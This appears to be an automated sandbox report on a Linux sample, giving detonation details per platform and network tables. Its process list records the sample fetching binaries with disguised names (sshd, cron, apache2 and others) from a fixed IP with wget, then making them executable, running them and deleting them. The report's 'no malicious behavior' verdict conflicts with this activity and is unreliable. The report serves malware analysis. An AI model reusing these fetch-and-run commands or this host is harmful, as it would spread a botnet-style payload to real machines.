Analysis Overview
SHA256
89636c6b497c8d80ac5043a61296c7b5e4422d1f0b96a414f15d0df5beb16e6c
Threat Level: No (potentially) malicious behavior was detected
The file b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-16 22:10
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:12
Platform
debian9-armhf-20240611-en
Max time network
26s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:10
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:10
Platform
debian9-mipsel-20240418-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-16 22:10
Reported
2024-06-16 22:12
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
128s
Command Line
Signatures
Processes
/tmp/b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118
[/tmp/b56dc03f37d69b6ea1ee20c4d59ec13f_JaffaCakes118]
/usr/bin/wget
[wget http://89.203.249.29/ntpd]
/bin/chmod
[chmod +x ntpd]
/tmp/ntpd
[./ntpd]
/bin/rm
[rm -rf ntpd]
/usr/bin/wget
[wget http://89.203.249.29/sshd]
/bin/chmod
[chmod +x sshd]
/tmp/sshd
[./sshd]
/bin/rm
[rm -rf sshd]
/usr/bin/wget
[wget http://89.203.249.29/openssh]
/bin/chmod
[chmod +x openssh]
/tmp/openssh
[./openssh]
/bin/rm
[rm -rf openssh]
/usr/bin/wget
[wget http://89.203.249.29/bash]
/bin/chmod
[chmod +x bash]
/tmp/bash
[./bash]
/bin/rm
[rm -rf bash]
/usr/bin/wget
[wget http://89.203.249.29/tftp]
/bin/chmod
[chmod +x tftp]
/tmp/tftp
[./tftp]
/bin/rm
[rm -rf tftp]
/usr/bin/wget
[wget http://89.203.249.29/wget]
/bin/chmod
[chmod +x wget]
/tmp/wget
[./wget]
/bin/rm
[rm -rf wget]
/usr/bin/wget
[wget http://89.203.249.29/cron]
/bin/chmod
[chmod +x cron]
/tmp/cron
[./cron]
/bin/rm
[rm -rf cron]
/usr/bin/wget
[wget http://89.203.249.29/ftp]
/bin/chmod
[chmod +x ftp]
/tmp/ftp
[./ftp]
/bin/rm
[rm -rf ftp]
/usr/bin/wget
[wget http://89.203.249.29/pftp]
/bin/chmod
[chmod +x pftp]
/tmp/pftp
[./pftp]
/bin/rm
[rm -rf pftp]
/usr/bin/wget
[wget http://89.203.249.29/sh]
/bin/chmod
[chmod +x sh]
/tmp/sh
[./sh]
/bin/rm
[rm -rf sh]
/usr/bin/wget
[wget http://89.203.249.29/[cpu]]
/bin/chmod
[chmod +x [cpu]]
/tmp/[cpu]
[./[cpu]]
/bin/rm
[rm -rf [cpu]]
/usr/bin/wget
[wget http://89.203.249.29/apache2]
/bin/chmod
[chmod +x apache2]
/tmp/apache2
[./apache2]
/bin/rm
[rm -rf apache2]
/usr/bin/wget
[wget http://89.203.249.29/telnetd]
/bin/chmod
[chmod +x telnetd]
/tmp/telnetd
[./telnetd]
/bin/rm
[rm -rf telnetd]
Network
| Country | Destination | Domain | Proto |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| GB | 195.181.164.19:443 | tcp | |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp | |
| CZ | 89.203.249.29:80 | 89.203.249.29 | tcp |
| CZ | 89.203.249.29:443 | tcp |